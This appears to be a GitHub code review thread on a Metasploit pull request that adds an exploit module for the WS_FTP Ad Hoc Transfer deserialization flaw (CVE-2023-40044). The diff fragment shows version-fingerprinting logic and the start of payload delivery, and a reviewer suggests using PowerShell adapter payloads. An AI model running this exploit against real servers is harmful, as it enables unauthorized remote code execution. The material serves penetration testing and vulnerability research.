modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb

```diff
@@ -0,0 +1,175 @@
+          ],
+          [
+            'Windows Powershell',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :windows_powershell
+            }
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        # This URI path can be anything so long as it begins with /AHT/. We default ot /AHT/ as it is less obvious in
+        # the IIS logs as to what the request is for, however the user can change this as needed if required.
+        Msf::OptString.new('TARGET_URI', [ false, 'Target URI used to exploit the deserialization vulnerability. Must begin with /AHT/', '/AHT/']),
+      ]
+    )
+  end
+
+  def check
+    # As the vulnerability lies in the WS_FTP Ad Hoc Transfer (AHT) module, we query the index HTML file for AHT.
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/AHT/AHT_UI/public/index.html'
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    title = Nokogiri::HTML(res.body).xpath('//head/title')&.text
+
+    # We verify the target is running the AHT module, by inspecting the HTML heads title.
+    if title == 'Ad Hoc Transfer'
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => '/AHT/AHT_UI/public/js/app.min.js'
+      )
+
+      return CheckCode::Unknown('Connection failed') unless res
+
+      # The patched versions were released on September 2023. We can query the date stamp in the app.min.js file
+      # to see when this file was built. If it is before Sept 2023, then we have a vulnerable version of WS_FTP,
+      # but if it was build on Sept 2023 or after, it is not vulnerable.
+
+      if res.code == 200 && res.body =~ %r{/\*! fileTransfer (\d+)-(\d+)-(\d+) \*/}
+        day = ::Regexp.last_match(1).to_i
+        month = ::Regexp.last_match(2).to_i
+        year = ::Regexp.last_match(3).to_i
+
+        description = "Detected a build date of #{day}-#{month}-#{year}"
+
+        if year > 2023 || (year == 2023 && month >= 9)
+          return CheckCode::Safe(description)
+        end
+
+        return CheckCode::Appears(description)
+      end
+
+      # If we couldn't get the JS build date, we at least know the target is WS_FTP with the Ad Hoc Transfer module.
+      return CheckCode::Detected
+    end
+
+    CheckCode::Unknown
+  end
+
+  def exploit
+    unless datastore['TARGET_URI'].start_with? '/AHT/'
+      fail_with(Failure::BadConfig, 'The TARGET_URI must begin with /AHT/')
+    end
+
+    case target['Type']
+    when :windows_command
+      execute_command(payload.encoded)
+    when :windows_powershell
+      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
```

Comment:
This is no longer necessary. You should be able to completely remove this code, the mixin inclusion, and the target definition. Users can now use the powershell adapter payloads added in #16548 (one of `cmd/windows/powershell/*`).

As a module author, the adapters allow you to simply define the command target and the framework will handle the rest.

Reply:
That's cool, I didn't realize this existed! Implemented in [1be8e02](https://github.com/rapid7/metasploit-framework/pull/18414/commits/1be8e0245b71b00b7eecb28de6b306ab9ea4f3d0)